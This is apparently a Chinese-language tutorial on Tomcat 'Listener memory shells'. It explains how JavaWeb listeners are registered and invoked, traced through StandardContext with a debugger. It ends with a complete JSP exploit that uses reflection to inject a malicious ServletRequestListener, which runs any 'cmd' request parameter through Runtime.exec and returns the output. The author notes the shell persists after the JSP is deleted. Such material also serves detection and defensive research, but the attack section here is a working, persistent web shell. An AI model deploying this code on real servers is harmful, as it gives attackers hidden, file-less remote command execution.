0x01 什么是Listener内存马

什么是Listener

和 Filter 一样,监听器是 JavaWeb 三大组件之一。它是一个实现特定接口的java程序,这个程序用于监听web应用中的一些对象,信息的创建,添加,销毁等,然后针对于这些情况做出相应处理。总结来说,就是在application,session,request三个对象创建消亡或者往其中添加修改删除属性时自动执行代码的功能组件。

Listener的三大域对象

监听器有三个域对象,指的是在监听器中可以访问的特定范围内的数据对象。分别为

ServletContext域对象——用于在整个 Java Web 应用程序中共享数据、资源和配置信息。

ServletRequest域对象——用于在一次 HTTP 请求处理期间共享数据和信息。

HttpSession域对象——用于在用户会话期间存储和共享数据,跨足够长的时间间隔保持信息状态。

根据不同域对象的功能,很明显 ServletRequest 类型是适合注入内存马的,我们注入一个有恶意代码的ServletRequest类型的监听器,当有HTTP请求处理时,注入的监听器就会发挥作用,执行恶意代码,这就是Listener内存马。

0x02 代码实现

创建一个ServletRequest类型的监听器,继承 ServletRequestListener 接口,需要重写requestInitialized方法,和过滤器的doFilter方法一样,requestInitialized方法也是处理监听器业务的方法。

package Listener;

import javax.servlet.ServletRequestEvent;
import javax.servlet.ServletRequestListener;

public class MyListener implements ServletRequestListener {
@Override
public void requestInitialized(ServletRequestEvent sre){
System.out.println("Listener被执行");

}
}

代码很短,只用作测试

同时需要修改 web.xml 配置文件

<listener>
<listener-class>Listener.MyListener</listener-class>
</listener>

启动服务器,

可以在日志中看到输出信息,监听器被调用,requestInitialized方法被执行

0x03 流程分析

想要成功注册Listener内存马,必须要了解Listener的生成以及调用

读取配置文件

在应用启动的时候,ContextConfig 类首先会去读取配置文件,主要方法是configureContext,在这个方法下个断点

首先确定 Servlet 上下文的配置信息,然后会遍历这个xml配置文件里的Filter和Listener,这里遍历到MyListener这个监听器,然后调用 StandardContext 的 addApplicationListener 方法,跟进

在这之前做一些检查,检查是否存在相同的监听器,然后整合起来,把它赋值为 applicationListeners 数组里

到这调试就结束,只要知道解析完web.xml里的Listener后,会把解析完的监听器添加到applicationListeners 数组里就够了。

Listener被调用

读取配置文件之后,StandardContext 会首先调用 listenerStart 方法,经过一些检查,然后开启监听。

断点不能直接下在requestInitialized方法里,因为流程差不多调用完了,没东西了。把断点下在StandardContext类的fireRequestInitEvent方法里

开始调试

跟进 getApplicationEventListeners 方法

获取存放监听器的数组,查找用法,看看什么地方调用了 applicationEventListenersList

这个方法是将监听器放进这个数组里,继续往下看

对监听器数组进行遍历,判断是否继承了 ServletRequestListener 接口,最终调用 requestInitialized 方法,到此分析流程结束。

0x04 攻击思路与exp编写

回想分析流程,遍历监听器数组,然后调用,我们的目标是将自己构造的Listener添加到数组中去,也就是 addApplicationEventListener 方法,通过反射将恶意的Listener添加进去。

还是首先构造上下文,也就是 StandardContext 通过执行流找到上下文生成的地方

这里通过 request 对象来创建,JSP内置了request对象,通过反射构造 StandardContext 对象

ServletContext servletContext =  request.getServletContext();  
Field applicationContextField = servletContext.getClass().getDeclaredField("context");
applicationContextField.setAccessible(true);
ApplicationContext applicationContext = (ApplicationContext) applicationContextField.get(servletContext);

Field standardContextField = applicationContext.getClass().getDeclaredField("context");
standardContextField.setAccessible(true);
StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);

然后编写一个恶意的Listener,最终写个jsp,完整exp(贴上师傅代码)

<%@ page import="org.apache.catalina.core.StandardContext" %>  
<%@ page import="java.util.List" %>
<%@ page import="java.util.Arrays" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="java.util.ArrayList" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.connector.Response" %>
<%!

class ListenerMemShell implements ServletRequestListener {

@Override
public void requestInitialized(ServletRequestEvent sre) {
String cmd;
try {
cmd = sre.getServletRequest().getParameter("cmd");
org.apache.catalina.connector.RequestFacade requestFacade = (org.apache.catalina.connector.RequestFacade) sre.getServletRequest();
Field requestField = Class.forName("org.apache.catalina.connector.RequestFacade").getDeclaredField("request");
requestField.setAccessible(true);
Request request = (Request) requestField.get(requestFacade);
Response response = request.getResponse();

if (cmd != null){
InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
int i = 0;
byte[] bytes = new byte[1024];
while ((i=inputStream.read(bytes)) != -1){
response.getWriter().write(new String(bytes,0,i));
response.getWriter().write("\r\n");
}
}
}catch (Exception e){
e.printStackTrace();
}
}
}
%>

<%
//获取standardContext上下文
ServletContext servletContext = request.getServletContext();
Field applicationContextField = servletContext.getClass().getDeclaredField("context");
applicationContextField.setAccessible(true);
ApplicationContext applicationContext = (ApplicationContext) applicationContextField.get(servletContext);

Field standardContextField = applicationContext.getClass().getDeclaredField("context");
standardContextField.setAccessible(true);
StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);

Object[] objects = standardContext.getApplicationEventListeners();
List<Object> listeners = Arrays.asList(objects);
List<Object> arrayList = new ArrayList(listeners);
arrayList.add(new ListenerMemShell());
standardContext.setApplicationEventListeners(arrayList.toArray());

%>

上传jsp文件

成功执行,即使文件删除,仍然可以执行命令。

参考链接:

https://drun1baby.top/2022/08/27/Java%E5%86%85%E5%AD%98%E9%A9%AC%E7%B3%BB%E5%88%97-04-Tomcat-%E4%B9%8B-Listener-%E5%9E%8B%E5%86%85%E5%AD%98%E9%A9%AC/#Listener-%E4%B8%89%E4%B8%AA%E5%9F%9F%E5%AF%B9%E8%B1%A1